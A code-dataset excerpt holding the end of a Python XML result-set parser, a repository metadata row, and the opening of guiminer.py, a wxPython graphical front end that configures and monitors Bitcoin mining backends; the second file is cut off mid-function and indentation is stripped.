Each tuple contains a string as the first element which represents
the XML element that the resultset needs to be on the lookout for
and a Python class as the second element of the tuple. Each time the
specified element is found in the XML, a new instance of the class
will be created and popped onto the stack.
:ivar str next_token: A hash used to assist in paging through very long
result sets. In most cases, passing this value to certain methods
will give you another 'page' of results.
"""
def __init__(self, marker_elem=None):
list.__init__(self)
if isinstance(marker_elem, list):
self.markers = marker_elem
else:
self.markers = []
self.marker = None
self.key_marker = None
self.next_marker = None # avail when delimiter used
self.next_key_marker = None
self.next_upload_id_marker = None
self.next_version_id_marker = None
self.version_id_marker = None
self.is_truncated = False
self.next_token = None
self.status = True
def startElement(self, name, attrs, connection):
for t in self.markers:
if name == t[0]:
obj = t[1](connection)
self.append(obj)
return obj
if name == 'Owner':
# Makes owner available for get_service and
# perhaps other lists where not handled by
# another element.
self.owner = User()
return self.owner
return None
def to_boolean(self, value, true_value='true'):
if value == true_value:
return True
else:
return False
def endElement(self, name, value, connection):
if name == 'IsTruncated':
self.is_truncated = self.to_boolean(value)
elif name == 'Marker':
self.marker = value
elif name == 'KeyMarker':
self.key_marker = value
elif name == 'NextMarker':
self.next_marker = value
elif name == 'NextKeyMarker':
self.next_key_marker = value
elif name == 'VersionIdMarker':
self.version_id_marker = value
elif name == 'NextVersionIdMarker':
self.next_version_id_marker = value
elif name == 'UploadIdMarker':
self.upload_id_marker = value
elif name == 'NextUploadIdMarker':
self.next_upload_id_marker = value
elif name == 'Bucket':
self.bucket = value
elif name == 'MaxUploads':
self.max_uploads = int(value)
elif name == 'MaxItems':
self.max_items = int(value)
elif name == 'Prefix':
self.prefix = value
elif name == 'return':
self.status = self.to_boolean(value)
elif name == 'StatusCode':
self.status = self.to_boolean(value, 'Success')
elif name == 'ItemName':
self.append(value)
elif name == 'NextToken':
self.next_token = value
elif name == 'BoxUsage':
try:
connection.box_usage += float(value)
except:
pass
elif name == 'IsValid':
self.status = self.to_boolean(value, 'True')
else:
setattr(self, name, value)
class BooleanResult(object):
def __init__(self, marker_elem=None):
self.status = True
self.request_id = None
self.box_usage = None
def __repr__(self):
if self.status:
return 'True'
else:
return 'False'
def __nonzero__(self):
return self.status
def startElement(self, name, attrs, connection):
return None
def to_boolean(self, value, true_value='true'):
if value == true_value:
return True
else:
return False
def endElement(self, name, value, connection):
if name == 'return':
self.status = self.to_boolean(value)
elif name == 'StatusCode':
self.status = self.to_boolean(value, 'Success')
elif name == 'IsValid':
self.status = self.to_boolean(value, 'True')
elif name == 'RequestId':
self.request_id = value
elif name == 'requestId':
self.request_id = value
elif name == 'BoxUsage':
self.request_id = value
else:
setattr(self, name, value)
| gpl-3.0 | 7,787,772,964,696,987,000 | 36.041916 | 79 | 0.606693 | false |
dpk9/poclbm | guiminer.py | 2 | 101317 | #!/usr/bin/python
"""GUIMiner - graphical frontend to Bitcoin miners.
Currently supports:
- m0mchil's "poclbm"
- puddinpop's "rpcminer"
- ufasoft's "bitcoin-miner"
Copyright 2011-2012 Chris MacLeod
This program is released under the GNU GPL. See LICENSE.txt for details.
"""
import sys, os, subprocess, errno, re, threading, logging, time, httplib, urllib
print sys.path
import wx
import json
import collections
try:
import win32api, win32con, win32process
except ImportError:
pass
from wx.lib.agw import flatnotebook as fnb
from wx.lib.agw import hyperlink
from wx.lib.newevent import NewEvent
__version__ = '2012-12-03'
def get_module_path():
"""Return the folder containing this script (or its .exe)."""
module_name = sys.executable if hasattr(sys, 'frozen') else __file__
abs_path = os.path.abspath(module_name)
return os.path.dirname(abs_path)
USE_MOCK = '--mock' in sys.argv
# Set up localization; requires the app to be created
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
_ = wx.GetTranslation
LANGUAGES = {
"Chinese Simplified": wx.LANGUAGE_CHINESE_SIMPLIFIED,
"Dutch": wx.LANGUAGE_DUTCH,
"English": wx.LANGUAGE_ENGLISH,
"Esperanto": wx.LANGUAGE_ESPERANTO,
"French": wx.LANGUAGE_FRENCH,
"German": wx.LANGUAGE_GERMAN,
"Hungarian": wx.LANGUAGE_HUNGARIAN,
"Italian": wx.LANGUAGE_ITALIAN,
"Portuguese": wx.LANGUAGE_PORTUGUESE,
"Russian": wx.LANGUAGE_RUSSIAN,
"Spanish": wx.LANGUAGE_SPANISH,
}
LANGUAGES_REVERSE = dict((v, k) for (k, v) in LANGUAGES.items())
DONATION_ADDRESS = "1MDDh2h4cAZDafgc94mr9q95dhRYcJbNQo"
locale = None
language = None
def update_language(new_language):
global locale, language
language = new_language
if locale:
del locale
locale = wx.Locale(language)
if locale.IsOk():
locale.AddCatalogLookupPathPrefix(os.path.join(get_module_path(), "locale"))
locale.AddCatalog("guiminer")
else:
locale = None
def load_language():
language_config = os.path.join(get_module_path(), 'default_language.ini')
language_data = dict()
if os.path.exists(language_config):
with open(language_config) as f:
language_data.update(json.load(f))
language_str = language_data.get('language', "English")
update_language(LANGUAGES.get(language_str, wx.LANGUAGE_ENGLISH))
def save_language():
language_config = os.path.join(get_module_path(), 'default_language.ini')
language_str = LANGUAGES_REVERSE.get(language)
with open(language_config, 'w') as f:
json.dump(dict(language=language_str), f)
load_language()
ABOUT_TEXT = _(
"""GUIMiner
Version: %(version)s
GUI by Chris 'Kiv' MacLeod
Original poclbm miner by m0mchil
Original rpcminer by puddinpop
Get the source code or file issues at GitHub:
https://github.com/Kiv/poclbm
If you enjoyed this software, support its development
by donating to:
%(address)s
Even a single Bitcoin is appreciated and helps motivate
further work on this software.
""")
# Translatable strings that are used repeatedly
STR_NOT_STARTED = _("Not started")
STR_STARTING = _("Starting...")
STR_STOPPED = _("Stopped")
STR_PAUSED = _("Paused")
STR_START_MINING = _("Start mining!")
STR_STOP_MINING = _("Stop mining")
STR_REFRESH_BALANCE = _("Refresh balance")
STR_CONNECTION_ERROR = _("Connection error")
STR_USERNAME = _("Username:")
STR_PASSWORD = _("Password:")
STR_QUIT = _("Quit this program")
STR_ABOUT = _("Show about dialog")
# Alternate backends that we know how to call
SUPPORTED_BACKENDS = [
"rpcminer-4way.exe",
"rpcminer-cpu.exe",
"rpcminer-cuda.exe",
"rpcminer-opencl.exe",
# "phoenix.py",
# "phoenix.exe",
"bitcoin-miner.exe"
]
USER_AGENT = "guiminer/" + __version__
# Time constants
SAMPLE_TIME_SECS = 3600
REFRESH_RATE_MILLIS = 2000
# Layout constants
LBL_STYLE = wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL
BTN_STYLE = wx.ALIGN_CENTER_HORIZONTAL | wx.ALL
# Events sent from the worker threads
(UpdateHashRateEvent, EVT_UPDATE_HASHRATE) = NewEvent()
(UpdateAcceptedEvent, EVT_UPDATE_ACCEPTED) = NewEvent()
(UpdateSoloCheckEvent, EVT_UPDATE_SOLOCHECK) = NewEvent()
(UpdateStatusEvent, EVT_UPDATE_STATUS) = NewEvent()
# Utility functions
def merge_whitespace(s):
"""Combine multiple whitespace characters found in s into one."""
s = re.sub(r"( +)|\t+", " ", s)
return s.strip()
def get_opencl_devices():
"""Return a list of available OpenCL devices.
Raises ImportError if OpenCL is not found.
Raises IOError if no OpenCL devices are found.
"""
import pyopencl
device_strings = []
platforms = pyopencl.get_platforms() #@UndefinedVariable
for i, platform in enumerate(platforms):
devices = platform.get_devices()
for j, device in enumerate(devices):
device_strings.append('[%d-%d] %s' %
(i, j, merge_whitespace(device.name)[:25]))
if len(device_strings) == 0:
raise IOError
return device_strings
def get_icon_bundle():
"""Return the Bitcoin program icon bundle."""
return wx.IconBundleFromFile(os.path.join(get_module_path(), "logo.ico"), wx.BITMAP_TYPE_ICO)
def get_taskbar_icon():
"""Return the taskbar icon.
This works around Window's annoying behavior of ignoring the 16x16 image
and using nearest neighbour downsampling on the 32x32 image instead."""
ib = get_icon_bundle()
return ib.GetIcon((16, 16))
def mkdir_p(path):
"""If the directory 'path' doesn't exist, create it. Same as mkdir -p."""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
def add_tooltip(widget, text):
"""Add a tooltip to widget with the specified text."""
tooltip = wx.ToolTip(text)
widget.SetToolTip(tooltip)
def format_khash(rate):
"""Format rate for display. A rate of 0 means just connected."""
if rate > 10 ** 6:
return _("%.3f Ghash/s") % (rate / 1000000.)
if rate > 10 ** 3:
return _("%.1f Mhash/s") % (rate / 1000.)
elif rate == 0:
return _("Connecting...")
else:
return _("%d khash/s") % rate
def format_balance(amount):
"""Format a quantity of Bitcoins in BTC."""
return "%.3f BTC" % float(amount)
def init_logger():
"""Set up and return the logging object and custom formatter."""
logger = logging.getLogger("poclbm-gui")
logger.setLevel(logging.DEBUG)
file_handler = logging.FileHandler(
os.path.join(get_module_path(), 'guiminer.log'), 'w')
formatter = logging.Formatter("%(asctime)s: %(message)s",
"%Y-%m-%d %H:%M:%S")
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger, formatter
logger, formatter = init_logger()
def http_request(hostname, *args, **kwargs):
"""Do a HTTP request and return the response data."""
conn_cls = httplib.HTTPSConnection if kwargs.get('use_https') else httplib.HTTPConnection
conn = conn_cls(hostname)
try:
logger.debug(_("Requesting balance: %(request)s"), dict(request=args))
conn.request(*args)
response = conn.getresponse()
data = response.read()
logger.debug(_("Server replied: %(status)s, %(data)s"),
dict(status=str(response.status), data=data))
return response, data
finally:
conn.close()
def get_process_affinity(pid):
"""Return the affinity mask for the specified process."""
flags = win32con.PROCESS_QUERY_INFORMATION
handle = win32api.OpenProcess(flags, 0, pid)
return win32process.GetProcessAffinityMask(handle)[0]
def set_process_affinity(pid, mask):
"""Set the affinity for process to mask."""
flags = win32con.PROCESS_QUERY_INFORMATION | win32con.PROCESS_SET_INFORMATION
handle = win32api.OpenProcess(flags, 0, pid)
win32process.SetProcessAffinityMask(handle, mask)
def find_nth(haystack, needle, n):
"""Return the index of the nth occurrence of needle in haystack."""
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start + len(needle))
n -= 1
return start
class ConsolePanel(wx.Panel):
"""Panel that displays logging events.
Uses with a StreamHandler to log events to a TextCtrl. Thread-safe.
"""
def __init__(self, parent, n_max_lines):
wx.Panel.__init__(self, parent, -1)
self.parent = parent
self.n_max_lines = n_max_lines
vbox = wx.BoxSizer(wx.VERTICAL)
style = wx.TE_MULTILINE | wx.TE_READONLY | wx.HSCROLL
self.text = wx.TextCtrl(self, -1, "", style=style)
vbox.Add(self.text, 1, wx.EXPAND)
self.SetSizer(vbox)
self.handler = logging.StreamHandler(self)
formatter = logging.Formatter("%(asctime)s: %(message)s",
"%Y-%m-%d %H:%M:%S")
self.handler.setFormatter(formatter)
logger.addHandler(self.handler)
def on_focus(self):
"""On focus, clear the status bar."""
self.parent.statusbar.SetStatusText("", 0)
self.parent.statusbar.SetStatusText("", 1)
def on_close(self):
"""On closing, stop handling logging events."""
logger.removeHandler(self.handler)
def append_text(self, text):
self.text.AppendText(text)
lines_to_cut = self.text.GetNumberOfLines() - self.n_max_lines
if lines_to_cut > 0:
contents = self.text.GetValue()
position = find_nth(contents, '\n', lines_to_cut)
self.text.ChangeValue(contents[position + 1:])
def write(self, text):
"""Forward logging events to our TextCtrl."""
wx.CallAfter(self.append_text, text)
class SummaryPanel(wx.Panel):
"""Panel that displays a summary of all miners."""
def __init__(self, parent):
wx.Panel.__init__(self, parent, -1)
self.parent = parent
self.timer = wx.Timer(self)
self.timer.Start(REFRESH_RATE_MILLIS)
self.Bind(wx.EVT_TIMER, self.on_timer)
flags = wx.ALIGN_CENTER_HORIZONTAL | wx.ALL
border = 5
self.column_headers = [
(wx.StaticText(self, -1, _("Miner")), 0, flags, border),
(wx.StaticText(self, -1, _("Speed")), 0, flags, border),
(wx.StaticText(self, -1, _("Accepted")), 0, flags, border),
(wx.StaticText(self, -1, _("Stale")), 0, flags, border),
(wx.StaticText(self, -1, _("Start/Stop")), 0, flags, border),
(wx.StaticText(self, -1, _("Autostart")), 0, flags, border),
]
font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
font.SetUnderlined(True)
for st in self.column_headers:
st[0].SetFont(font)
self.grid = wx.FlexGridSizer(0, len(self.column_headers), 2, 2)
self.grid.AddMany(self.column_headers)
self.add_miners_to_grid()
self.grid.AddGrowableCol(0)
self.grid.AddGrowableCol(1)
self.grid.AddGrowableCol(2)
self.grid.AddGrowableCol(3)
self.SetSizer(self.grid)
def add_miners_to_grid(self):
"""Add a summary row for each miner to the summary grid."""
# Remove any existing widgets except the column headers.
for i in reversed(range(len(self.column_headers), len(self.grid.GetChildren()))):
self.grid.Hide(i)
self.grid.Remove(i)
for p in self.parent.profile_panels:
p.clear_summary_widgets()
self.grid.AddMany(p.get_summary_widgets(self))
self.grid.Layout()
def on_close(self):
self.timer.Stop()
def on_timer(self, event=None):
"""Whenever the timer goes off, fefresh the summary data."""
if self.parent.nb.GetSelection() != self.parent.nb.GetPageIndex(self):
return
for p in self.parent.profile_panels:
p.update_summary()
self.parent.statusbar.SetStatusText("", 0) # TODO: show something
total_rate = sum(p.last_rate for p in self.parent.profile_panels
if p.is_mining)
if any(p.is_mining for p in self.parent.profile_panels):
self.parent.statusbar.SetStatusText(format_khash(total_rate), 1)
else:
self.parent.statusbar.SetStatusText("", 1)
def on_focus(self):
"""On focus, show the statusbar text."""
self.on_timer()
class GUIMinerTaskBarIcon(wx.TaskBarIcon):
"""Taskbar icon for the GUI.
Shows status messages on hover and opens on click.
"""
TBMENU_RESTORE = wx.NewId()
TBMENU_PAUSE = wx.NewId()
TBMENU_CLOSE = wx.NewId()
TBMENU_CHANGE = wx.NewId()
TBMENU_REMOVE = wx.NewId()
def __init__(self, frame):
wx.TaskBarIcon.__init__(self)
self.frame = frame
self.icon = get_taskbar_icon()
self.timer = wx.Timer(self)
self.timer.Start(REFRESH_RATE_MILLIS)
self.is_paused = False
self.SetIcon(self.icon, "GUIMiner")
self.imgidx = 1
self.Bind(wx.EVT_TASKBAR_LEFT_DCLICK, self.on_taskbar_activate)
self.Bind(wx.EVT_MENU, self.on_taskbar_activate, id=self.TBMENU_RESTORE)
self.Bind(wx.EVT_MENU, self.on_taskbar_close, id=self.TBMENU_CLOSE)
self.Bind(wx.EVT_MENU, self.on_pause, id=self.TBMENU_PAUSE)
self.Bind(wx.EVT_TIMER, self.on_timer)
def CreatePopupMenu(self):
"""Override from wx.TaskBarIcon. Creates the right-click menu."""
menu = wx.Menu()
menu.AppendCheckItem(self.TBMENU_PAUSE, _("Pause all"))
menu.Check(self.TBMENU_PAUSE, self.is_paused)
menu.Append(self.TBMENU_RESTORE, _("Restore"))
menu.Append(self.TBMENU_CLOSE, _("Close"))
return menu
def on_taskbar_activate(self, evt):
if self.frame.IsIconized():
self.frame.Iconize(False)
if not self.frame.IsShown():
self.frame.Show(True)
self.frame.Raise()
def on_taskbar_close(self, evt):
wx.CallAfter(self.frame.Close, force=True)
def on_timer(self, event):
"""Refresh the taskbar icon's status message."""
objs = self.frame.profile_panels
if objs:
text = '\n'.join(p.get_taskbar_text() for p in objs)
self.SetIcon(self.icon, text)
def on_pause(self, event):
"""Pause or resume the currently running miners."""
self.is_paused = event.Checked()
for miner in self.frame.profile_panels:
if self.is_paused:
miner.pause()
else:
miner.resume()
class MinerListenerThread(threading.Thread):
LINES = [
(r"Target =|average rate|Sending to server|found hash|connected to|Setting server",
lambda _: None), # Just ignore lines like these
(r"accepted|\"result\":\s*true",
lambda _: UpdateAcceptedEvent(accepted=True)),
(r"invalid|stale|rejected", lambda _:
UpdateAcceptedEvent(accepted=False)),
(r"(\d+)\s*khash/s", lambda match:
UpdateHashRateEvent(rate=int(match.group(1)))),
(r"(\d+\.\d+)\s*MH/s", lambda match:
UpdateHashRateEvent(rate=float(match.group(1)) * 1000)),
(r"(\d+\.\d+)\s*Mhash/s", lambda match:
UpdateHashRateEvent(rate=float(match.group(1)) * 1000)),
(r"(\d+)\s*Mhash/s", lambda match:
UpdateHashRateEvent(rate=int(match.group(1)) * 1000)),
(r"checking (\d+)", lambda _:
UpdateSoloCheckEvent()),
]
def __init__(self, parent, miner):
threading.Thread.__init__(self)
self.shutdown_event = threading.Event()
self.parent = parent
self.parent_name = parent.name
self.miner = miner
def run(self):
logger.info(_('Listener for "%s" started') % self.parent_name)
while not self.shutdown_event.is_set():
line = self.miner.stdout.readline().strip()
#logger.debug("Line: %s", line)
if not line: continue
for s, event_func in self.LINES: # Use self to allow subclassing
match = re.search(s, line, flags=re.I)
if match is not None:
event = event_func(match)
if event is not None:
wx.PostEvent(self.parent, event)
break
else:
# Possible error or new message, just pipe it through
event = UpdateStatusEvent(text=line)
logger.info(_('Listener for "%(name)s": %(line)s'),
dict(name=self.parent_name, line=line))
wx.PostEvent(self.parent, event)
logger.info(_('Listener for "%s" shutting down'), self.parent_name)
class PhoenixListenerThread(MinerListenerThread):
LINES = [
(r"Result: .* accepted",
lambda _: UpdateAcceptedEvent(accepted=True)),
(r"Result: .* rejected", lambda _:
UpdateAcceptedEvent(accepted=False)),
(r"(\d+)\.?(\d*) Khash/sec", lambda match:
UpdateHashRateEvent(rate=float(match.group(1) + '.' + match.group(2)))),
(r"(\d+)\.?(\d*) Mhash/sec", lambda match:
UpdateHashRateEvent(rate=float(match.group(1) + '.' + match.group(2)) * 1000)),
(r"Currently on block",
lambda _: None), # Just ignore lines like these
]
class CgListenerThread(MinerListenerThread):
LINES = [
(r"Accepted .* GPU \d+ thread \d+",
lambda _: UpdateAcceptedEvent(accepted=True)),
(r"Rejected .* GPU \d+ thread \d+",
lambda _: UpdateAcceptedEvent(accepted=False)),
(r"\(avg\):(\d+)\.?(\d*)Mh/s", lambda match:
UpdateHashRateEvent(rate=float(match.group(1) + '.' + match.group(2)) * 1000)),
(r"^GPU\s*\d+",
lambda _: None), # Just ignore lines like these
]
class MinerTab(wx.Panel):
"""A tab in the GUI representing a miner instance.
Each MinerTab has these responsibilities:
- Persist its data to and from the config file
- Launch a backend subprocess and monitor its progress
by creating a MinerListenerThread.
- Post updates to the GUI's statusbar & summary panel; the format depends
whether the backend is working solo or in a pool.
"""
def __init__(self, parent, id, devices, servers, defaults, statusbar, data):
wx.Panel.__init__(self, parent, id)
self.parent = parent
self.servers = servers
self.defaults = defaults
self.statusbar = statusbar
self.is_mining = False
self.is_paused = False
self.is_possible_error = False
self.miner = None # subprocess.Popen instance when mining
self.miner_listener = None # MinerListenerThread when mining
self.solo_blocks_found = 0
self.accepted_shares = 0 # shares for pool, diff1 hashes for solo
self.accepted_times = collections.deque()
self.invalid_shares = 0
self.invalid_times = collections.deque()
self.last_rate = 0 # units of khash/s
self.autostart = False
self.num_processors = int(os.getenv('NUMBER_OF_PROCESSORS', 1))
self.affinity_mask = 0
self.server_lbl = wx.StaticText(self, -1, _("Server:"))
self.summary_panel = None # SummaryPanel instance if summary open
self.server = wx.ComboBox(self, -1,
choices=[s['name'] for s in servers],
style=wx.CB_READONLY)
self.website_lbl = wx.StaticText(self, -1, _("Website:"))
self.website = hyperlink.HyperLinkCtrl(self, -1, "")
self.external_lbl = wx.StaticText(self, -1, _("Ext. Path:"))
self.txt_external = wx.TextCtrl(self, -1, "")
self.host_lbl = wx.StaticText(self, -1, _("Host:"))
self.txt_host = wx.TextCtrl(self, -1, "")
self.port_lbl = wx.StaticText(self, -1, _("Port:"))
self.txt_port = wx.TextCtrl(self, -1, "")
self.user_lbl = wx.StaticText(self, -1, STR_USERNAME)
self.txt_username = wx.TextCtrl(self, -1, "")
self.pass_lbl = wx.StaticText(self, -1, STR_PASSWORD)
self.txt_pass = wx.TextCtrl(self, -1, "", style=wx.TE_PASSWORD)
self.device_lbl = wx.StaticText(self, -1, _("Device:"))
self.device_listbox = wx.ComboBox(self, -1, choices=devices or [_("No OpenCL devices")], style=wx.CB_READONLY)
self.flags_lbl = wx.StaticText(self, -1, _("Extra flags:"))
self.txt_flags = wx.TextCtrl(self, -1, "")
self.extra_info = wx.StaticText(self, -1, "")
self.affinity_lbl = wx.StaticText(self, -1, _("CPU Affinity:"))
self.affinity_chks = [wx.CheckBox(self, label='%d ' % i)
for i in range(self.num_processors)]
self.balance_lbl = wx.StaticText(self, -1, _("Balance:"))
self.balance_amt = wx.StaticText(self, -1, "0")
self.balance_refresh = wx.Button(self, -1, STR_REFRESH_BALANCE)
self.balance_refresh_timer = wx.Timer()
self.withdraw = wx.Button(self, -1, _("Withdraw"))
self.balance_cooldown_seconds = 0
self.balance_auth_token = ""
self.labels = [self.server_lbl, self.website_lbl,
self.host_lbl, self.port_lbl,
self.user_lbl, self.pass_lbl,
self.device_lbl, self.flags_lbl,
self.balance_lbl]
self.txts = [self.txt_host, self.txt_port,
self.txt_username, self.txt_pass,
self.txt_flags]
self.all_widgets = [self.server, self.website,
self.device_listbox,
self.balance_amt,
self.balance_refresh,
self.withdraw] + self.labels + self.txts + self.affinity_chks
self.hidden_widgets = [self.extra_info,
self.txt_external,
self.external_lbl]
self.start = wx.Button(self, -1, STR_START_MINING)
self.device_listbox.SetSelection(0)
self.server.SetStringSelection(self.defaults.get('default_server'))
self.set_data(data)
for txt in self.txts:
txt.Bind(wx.EVT_KEY_UP, self.check_if_modified)
self.device_listbox.Bind(wx.EVT_COMBOBOX, self.check_if_modified)
self.start.Bind(wx.EVT_BUTTON, self.toggle_mining)
self.server.Bind(wx.EVT_COMBOBOX, self.on_select_server)
self.balance_refresh_timer.Bind(wx.EVT_TIMER, self.on_balance_cooldown_tick)
self.balance_refresh.Bind(wx.EVT_BUTTON, self.on_balance_refresh)
self.withdraw.Bind(wx.EVT_BUTTON, self.on_withdraw)
for chk in self.affinity_chks:
chk.Bind(wx.EVT_CHECKBOX, self.on_affinity_check)
self.Bind(EVT_UPDATE_HASHRATE, lambda event: self.update_khash(event.rate))
self.Bind(EVT_UPDATE_ACCEPTED, lambda event: self.update_shares(event.accepted))
self.Bind(EVT_UPDATE_STATUS, lambda event: self.update_status(event.text))
self.Bind(EVT_UPDATE_SOLOCHECK, lambda event: self.update_solo())
self.update_statusbar()
self.clear_summary_widgets()
@property
def last_update_time(self):
"""Return the local time of the last accepted share."""
if self.accepted_times:
return time.localtime(self.accepted_times[-1])
return None
@property
def server_config(self):
hostname = self.txt_host.GetValue()
return self.get_server_by_field(hostname, 'host')
@property
def is_solo(self):
"""Return True if this miner is configured for solo mining."""
return self.server.GetStringSelection() == "solo"
@property
def is_modified(self):
"""Return True if this miner has unsaved changes pending."""
return self.last_data != self.get_data()
@property
def external_path(self):
"""Return the path to an external miner, or "" if none is present."""
return self.txt_external.GetValue()
@property
def is_external_miner(self):
"""Return True if this miner has an external path configured."""
return self.txt_external.GetValue() != ""
@property
def host_with_http_prefix(self):
"""Return the host address, with http:// prepended if needed."""
host = self.txt_host.GetValue()
if not host.startswith("http://"):
host = "http://" + host
return host
@property
def host_without_http_prefix(self):
"""Return the host address, with http:// stripped off if needed."""
host = self.txt_host.GetValue()
if host.startswith("http://"):
return host[len('http://'):]
return host
@property
def device_index(self):
"""Return the index of the currently selected OpenCL device."""
s = self.device_listbox.GetStringSelection()
match = re.search(r'\[(\d+)-(\d+)\]', s)
try: return int(match.group(2))
except: return 0
@property
def platform_index(self):
"""Return the index of the currently selected OpenCL platform."""
s = self.device_listbox.GetStringSelection()
match = re.search(r'\[(\d+)-(\d+)\]', s)
try: return int(match.group(1))
except: return 0
@property
def is_device_visible(self):
"""Return True if we are using a backend with device selection."""
NO_DEVICE_SELECTION = ['rpcminer', 'bitcoin-miner']
return not any(d in self.external_path for d in NO_DEVICE_SELECTION)
def on_affinity_check(self, event):
"""Set the affinity mask to the selected value."""
self.affinity_mask = 0
for i in range(self.num_processors):
is_checked = self.affinity_chks[i].GetValue()
self.affinity_mask += (is_checked << i)
if self.is_mining:
try:
set_process_affinity(self.miner.pid, self.affinity_mask)
except:
pass # TODO: test on Linux
def pause(self):
"""Pause the miner if we are mining, otherwise do nothing."""
if self.is_mining:
self.stop_mining()
self.is_paused = True
def resume(self):
"""Resume the miner if we are paused, otherwise do nothing."""
if self.is_paused:
self.start_mining()
self.is_paused = False
def get_data(self):
"""Return a dict of our profile data."""
return dict(name=self.name,
hostname=self.txt_host.GetValue(),
port=self.txt_port.GetValue(),
username=self.txt_username.GetValue(),
password=self.txt_pass.GetValue(),
device=self.device_listbox.GetSelection(),
flags=self.txt_flags.GetValue(),
autostart=self.autostart,
affinity_mask=self.affinity_mask,
balance_auth_token=self.balance_auth_token,
external_path=self.external_path)
def set_data(self, data):
"""Set our profile data to the information in data. See get_data()."""
self.last_data = data
default_server_config = self.get_server_by_field(
self.defaults['default_server'], 'name')
self.name = (data.get('name') or _('Default'))
# Backwards compatibility: hostname key used to be called server.
# We only save out hostname now but accept server from old INI files.
hostname = (data.get('hostname') or
data.get('server') or
default_server_config['host'])
self.txt_host.SetValue(hostname)
self.server.SetStringSelection(self.server_config.get('name', "Other"))
self.txt_username.SetValue(
data.get('username') or
self.defaults.get('default_username', ''))
self.txt_pass.SetValue(
data.get('password') or
self.defaults.get('default_password', ''))
self.txt_port.SetValue(str(
data.get('port') or
self.server_config.get('port', 8332)))
self.txt_flags.SetValue(data.get('flags', ''))
self.autostart = data.get('autostart', False)
self.affinity_mask = data.get('affinity_mask', 1)
for i in range(self.num_processors):
self.affinity_chks[i].SetValue((self.affinity_mask >> i) & 1)
self.txt_external.SetValue(data.get('external_path', ''))
# Handle case where they removed devices since last run.
device_index = data.get('device', None)
if device_index is not None and device_index < self.device_listbox.GetCount():
self.device_listbox.SetSelection(device_index)
self.change_server(self.server_config)
self.balance_auth_token = data.get('balance_auth_token', '')
def clear_summary_widgets(self):
"""Release all our summary widgets."""
self.summary_name = None
self.summary_status = None
self.summary_shares_accepted = None
self.summary_shares_stale = None
self.summary_start = None
self.summary_autostart = None
def get_start_stop_state(self):
"""Return appropriate text for the start/stop button."""
return _("Stop") if self.is_mining else _("Start")
def get_start_label(self):
return STR_STOP_MINING if self.is_mining else STR_START_MINING
def update_summary(self):
"""Update our summary fields if possible."""
if not self.summary_panel:
return
self.summary_name.SetLabel(self.name)
if self.is_paused:
text = STR_PAUSED
elif not self.is_mining:
text = STR_STOPPED
elif self.is_possible_error:
text = _("Connection problems")
else:
text = format_khash(self.last_rate)
self.summary_status.SetLabel(text)
self.summary_shares_accepted.SetLabel("%d (%d)" %
(self.accepted_shares, len(self.accepted_times)))
if self.is_solo:
self.summary_shares_invalid.SetLabel("-")
else:
self.summary_shares_invalid.SetLabel("%d (%d)" %
(self.invalid_shares, len(self.invalid_times)))
self.summary_start.SetLabel(self.get_start_stop_state())
self.summary_autostart.SetValue(self.autostart)
self.summary_panel.grid.Layout()
def get_summary_widgets(self, summary_panel):
"""Return a list of summary widgets suitable for sizer.AddMany."""
self.summary_panel = summary_panel
self.summary_name = wx.StaticText(summary_panel, -1, self.name)
self.summary_name.Bind(wx.EVT_LEFT_UP, self.show_this_panel)
self.summary_status = wx.StaticText(summary_panel, -1, STR_STOPPED)
self.summary_shares_accepted = wx.StaticText(summary_panel, -1, "0")
self.summary_shares_invalid = wx.StaticText(summary_panel, -1, "0")
self.summary_start = wx.Button(summary_panel, -1, self.get_start_stop_state(), style=wx.BU_EXACTFIT)
self.summary_start.Bind(wx.EVT_BUTTON, self.toggle_mining)
self.summary_autostart = wx.CheckBox(summary_panel, -1)
self.summary_autostart.Bind(wx.EVT_CHECKBOX, self.toggle_autostart)
self.summary_autostart.SetValue(self.autostart)
return [
(self.summary_name, 0, wx.ALIGN_CENTER_HORIZONTAL),
(self.summary_status, 0, wx.ALIGN_CENTER_HORIZONTAL, 0),
(self.summary_shares_accepted, 0, wx.ALIGN_CENTER_HORIZONTAL, 0),
(self.summary_shares_invalid, 0, wx.ALIGN_CENTER_HORIZONTAL, 0),
(self.summary_start, 0, wx.ALIGN_CENTER, 0),
(self.summary_autostart, 0, wx.ALIGN_CENTER, 0)
]
def show_this_panel(self, event):
"""Set focus to this panel."""
self.parent.SetSelection(self.parent.GetPageIndex(self))
def toggle_autostart(self, event):
self.autostart = event.IsChecked()
def toggle_mining(self, event):
"""Stop or start the miner."""
if self.is_mining:
self.stop_mining()
else:
self.start_mining()
self.update_summary()
#############################
# Begin backend specific code
def configure_subprocess_poclbm(self):
"""Set up the command line for poclbm."""
folder = get_module_path()
if USE_MOCK:
executable = "python mockBitcoinMiner.py"
else:
if hasattr(sys, 'frozen'):
executable = "poclbm.exe"
else:
executable = "python poclbm.py"
cmd = "%s %s:%s@%s:%s --device=%d --platform=%d --verbose -r1 %s" % (
executable,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.txt_host.GetValue(),
self.txt_port.GetValue(),
self.device_index,
self.platform_index,
self.txt_flags.GetValue()
)
return cmd, folder
def configure_subprocess_rpcminer(self):
"""Set up the command line for rpcminer.
The hostname must start with http:// for these miners.
"""
cmd = "%s -user=%s -password=%s -url=%s:%s %s" % (
self.external_path,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.host_with_http_prefix,
self.txt_port.GetValue(),
self.txt_flags.GetValue()
)
return cmd, os.path.dirname(self.external_path)
def configure_subprocess_ufasoft(self):
"""Set up the command line for ufasoft's SSE2 miner.
The hostname must start with http:// for these miners.
"""
cmd = "%s -u %s -p %s -o %s:%s %s" % (
self.external_path,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.host_with_http_prefix,
self.txt_port.GetValue(),
self.txt_flags.GetValue())
return cmd, os.path.dirname(self.external_path)
def configure_subprocess_phoenix(self):
"""Set up the command line for phoenix miner."""
path = self.external_path
if path.endswith('.py'):
path = "python " + path
cmd = "%s -u http://%s:%s@%s:%s PLATFORM=%d DEVICE=%d %s" % (
path,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.host_without_http_prefix,
self.txt_port.GetValue(),
self.platform_index,
self.device_index,
